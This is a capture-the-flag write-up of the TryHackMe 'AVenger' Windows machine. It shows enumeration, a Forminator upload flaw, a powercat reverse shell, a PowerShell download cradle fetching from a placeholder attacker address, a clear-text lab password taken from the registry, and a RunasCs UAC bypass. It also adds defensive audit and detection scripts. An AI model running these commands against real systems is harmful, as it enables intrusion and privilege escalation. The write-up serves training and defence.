🦸AVenger (Windows)
You’ve been asked to exploit all the vulnerabilities present.
Network Enumeration
AutoScan script
autoscan 10.10.141.171
nmap result
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Index of /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 5.5.5-10.4.28
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.28-MariaDB
| Thread ID: 9
| Capabilities flags: 63486
| Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsCompression, SupportsTransactions, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, IgnoreSigpipes, ODBCClient, FoundRows, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: GO6^Z'RHQ>$8+on]d_2y
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIFT
| NetBIOS_Domain_Name: GIFT
| NetBIOS_Computer_Name: GIFT
| DNS_Domain_Name: gift
| DNS_Computer_Name: gift
| Product_Version: 10.0.17763
|_ System_Time: 2025-08-05T10:18:18+00:00
|_ssl-date: 2025-08-05T10:18:26+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=gift
| Not valid before: 2025-08-04T10:00:35
|_Not valid after: 2026-02-03T10:00:35
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows
Windows system
SMB/RPC Enumeration (Null Session)
smbclient -L //10.10.141.171 -N
session setup failed: NT_STATUS_ACCESS_DENIED
rpcclient -U "" 10.10.141.171 -N
session setup failed: NT_STATUS_ACCESS_DENIED
Web Service Enumeration -p80
nmap result
80/tcp open http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
/gift
== NetBIOS_Computer_Name: GIFT
http://10.10.141.171/gift
→ Redirect: avenger.tryhackme/gift
avenger.tryhackme
→ /etc/hosts
avenger.tryhackme/gift/
WordPress 6.2.2
File upload form
DevTools Sources → Plugin: Forminator
avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
Forminator - Version 1.24.1
Exploiting: CVE-2023-4596 - Unauthenticated Arbitrary File Upload to RCE
Community PoC exploit
Error during exploitation: the malicious PHP file is blocked by the antivirus.
Manual exploitation
Powercat
powercat -c <ip-a> -p <port> -e cmd -g > uwu.ps1
echo "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://<ip-a>/uwu.ps1')" > uwu.bat
python3 -m http.server
nc -lvnp <port>
System intrusion
Shell: gift\hugo
Post-intrusion enumeration
whoami /all
No privileges useful for escalation
BUILTIN\Administrators
Mandatory Label\Medium Mandatory Level
Medium Mandatory Level refers to the integrity level assigned to standard user accounts and processes. It’s a security feature that helps protect the system by limiting the access rights of processes running at this level. This means that even if a user has administrator privileges, their standard user processes will run with a medium integrity level, preventing them from easily modifying system files or other high-integrity resources. UAC utilizes integrity levels to manage user privileges.
We are members of the Administrators group, but access to directories such as the local administrator's profile is restricted.
UAC bypass?
Credential extraction
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Credentials: hugo:SurpriseMF123!
Privilege Escalation: Reverse Shell with UAC Bypass
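From the defender's side, the finding here is a clear-text DefaultPassword under the Winlogon key, readable by any local user. The following Python script is an added example and not part of this writeup: it parses the text format that reg query prints and flags AutoAdminLogon and DefaultPassword. The sample output is constructed (the password is a placeholder); the value names are the standard Winlogon ones.

```python
r"""Audit Winlogon autologon settings from `reg query` output.

Added example, not part of the original writeup. It parses the text that
`reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"`
prints on a Windows host and reports whether a clear-text autologon
password is stored. The sample below is constructed for the example; the
value names (AutoAdminLogon, DefaultUserName, DefaultPassword, ...) are the
standard Winlogon ones.
"""
import re

# Constructed sample of `reg query` output. The password is a placeholder.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    DefaultDomainName    REG_SZ    GIFT
    DefaultUserName    REG_SZ    hugo
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    <password-placeholder>
    Shell    REG_SZ    explorer.exe
"""

# One registry value per line: <name> <REG_type> <data>
VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")


def parse_reg_query(text: str) -> dict:
    """Return {value_name: data} for every value line in reg query output.
    Key-path lines (starting with HKEY_) carry no REG_ type and never match."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = m.group(3)
    return values


def audit_autologon(values: dict) -> list:
    """Return a list of findings; an empty list means nothing to report."""
    findings = []
    if values.get("AutoAdminLogon", "0").strip() == "1":
        user = values.get("DefaultUserName", "<unknown>")
        domain = values.get("DefaultDomainName", "")
        account = f"{domain}\\{user}" if domain else user
        findings.append(f"AutoAdminLogon is enabled for {account}")
    if values.get("DefaultPassword"):
        findings.append("DefaultPassword is stored in clear text under Winlogon; "
                        "any user who can read HKLM can recover it")
    return findings


if __name__ == "__main__":
    for finding in audit_autologon(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("[!]", finding)
```

Mitigation on the host side: delete DefaultPassword and set AutoAdminLogon to 0, or configure autologon with Sysinternals Autologon, which stores the password as an LSA secret instead of a readable registry value.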
RunasCs
python3 -m http.server
powershell
wget http://<ip-a>:<port>/runasCs.exe -o runas.exe
nc -lvnp <port>
runas.exe hugo SurpriseMF123! "powershell -c IEX (New-Object System.Net.WebClient).DownloadString('http://<ip-a>:<port>/uwu.ps1')" --bypass-uac
New reverse shell without UAC restrictions
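Both the initial foothold (the uploaded batch file running a PowerShell download cradle from under Apache) and the RunasCs --bypass-uac step above leave recognisable process-creation events. The following Python script is an added example, not part of this writeup and not the output of any tool it names: it applies three rules to constructed process-creation records shaped like the fields of a Sysmon Event ID 1 record (ParentImage, Image, CommandLine). The XAMPP and profile paths and the password placeholder are assumptions.

```python
"""Process-creation triage for the techniques used in this writeup.

Added example, not part of the original writeup and not the output of any
tool it names. Three rules are applied to process-creation records shaped
like the fields of a Sysmon Event ID 1 record (ParentImage, Image,
CommandLine): a web server spawning a command interpreter (what an upload
RCE looks like from the host), a PowerShell download cradle run through
IEX, and the RunasCs --bypass-uac flag. All events below are constructed;
the XAMPP and profile paths and the password placeholder are assumptions.
"""
import re

SAMPLE_EVENTS = [
    # Apache (XAMPP) executing the uploaded batch file: the foothold.
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c uwu.bat"},
    # The batch file pulling and running the PowerShell stage.
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c IEX (New-Object System.Net.Webclient)"
                    ".DownloadString('http://<ip-a>/uwu.ps1')"},
    # RunasCs re-spawning the stage with an unfiltered token.
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\hugo\runas.exe",
     "CommandLine": "runas.exe hugo <password-placeholder> \"powershell -c IEX "
                    "(New-Object System.Net.WebClient).DownloadString("
                    "'http://<ip-a>:<port>/uwu.ps1')\" --bypass-uac"},
    # Benign interactive PowerShell use; should produce no finding.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
]

COMMAND_RULES = [
    (re.compile(r"\bIEX\b.*New-Object\s+(System\.)?Net\.WebClient.*DownloadString", re.I),
     "PowerShell download cradle (IEX + WebClient.DownloadString)"),
    (re.compile(r"--bypass-uac\b", re.I), "RunasCs --bypass-uac flag"),
]
WEB_SERVERS = {"httpd.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event: dict) -> list:
    """Return the list of rule labels that fire for one event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in WEB_SERVERS and image in INTERPRETERS:
        reasons.append(f"web server {parent} spawned {image} (web shell / upload RCE)")
    for pattern, label in COMMAND_RULES:
        if pattern.search(cmd):
            reasons.append(label)
    return reasons


def triage(events: list) -> list:
    """(event index, reason) pairs for every rule hit across all events."""
    return [(i, r) for i, ev in enumerate(events) for r in triage_event(ev)]


if __name__ == "__main__":
    for index, reason in triage(SAMPLE_EVENTS):
        print(f"event {index}: {reason}")
```

The parent/child rule is the one that catches the foothold even when the payload is obfuscated: an Apache worker has no business starting cmd.exe, so that pair is a strong signal regardless of the command line.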
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
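The listing above is the elevated token; the UAC-filtered token the first shell ran with is why whoami reported nothing useful. The following Python script is an added example and not part of this writeup: it parses whoami /priv output, lists the held privileges that matter for escalation whether they show Enabled or Disabled (a Disabled privilege is still held and can be switched on by the process), and diffs the elevated token against a constructed listing of a typical filtered token. ELEVATED_PRIV_OUTPUT is an abridged copy of the output above; FILTERED_PRIV_OUTPUT and the high-risk set are editorial constructions, not from the target.

```python
"""Audit a `whoami /priv` listing and show what UAC token filtering removes.

Added example, not part of the original writeup. ELEVATED_PRIV_OUTPUT is an
abridged copy of the output shown in the writeup (the elevated token obtained
through RunasCs); FILTERED_PRIV_OUTPUT is constructed and shows what the same
account's UAC-filtered, medium-integrity token typically reports. The
high-risk privilege set is an editorial choice, not from the writeup.
"""
import re

ELEVATED_PRIV_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeSecurityPrivilege           Manage auditing and security log          Enabled
SeTakeOwnershipPrivilege      Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege         Load and unload device drivers            Disabled
SeBackupPrivilege             Back up files and directories             Disabled
SeRestorePrivilege            Restore files and directories             Disabled
SeShutdownPrivilege           Shut down the system                      Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
"""

# Constructed: typical filtered token of an Administrators member under UAC.
FILTERED_PRIV_OUTPUT = """
Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
"""

# Privileges that on their own open a path to SYSTEM or to arbitrary file access.
HIGH_RISK = {
    "SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege", "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")


def parse_privileges(text: str) -> dict:
    """Return {privilege name: 'Enabled'|'Disabled'} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def high_risk_held(privs: dict) -> list:
    """High-risk privileges present in the token, whatever their state.
    'Disabled' only means not currently enabled; the process can switch it
    on with AdjustTokenPrivileges, so it still counts as held."""
    return sorted(p for p in privs if p in HIGH_RISK)


def removed_by_uac(elevated: dict, filtered: dict) -> list:
    """Privileges present in the elevated token but stripped from the filtered one."""
    return sorted(set(elevated) - set(filtered))


if __name__ == "__main__":
    elevated = parse_privileges(ELEVATED_PRIV_OUTPUT)
    filtered = parse_privileges(FILTERED_PRIV_OUTPUT)
    print("high-risk in elevated token:", high_risk_held(elevated))
    print("high-risk in filtered token:", high_risk_held(filtered))
    print("removed by UAC filtering:", removed_by_uac(elevated, filtered))
```

The point of the diff is the one the Medium Mandatory Level note above makes: the account never lost its Administrators membership, UAC only handed the first shell a token with the dangerous privileges stripped, so any audit that stops at "Disabled" or at the filtered token underestimates what the account can do.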
System compromise
Shell: Administrator Account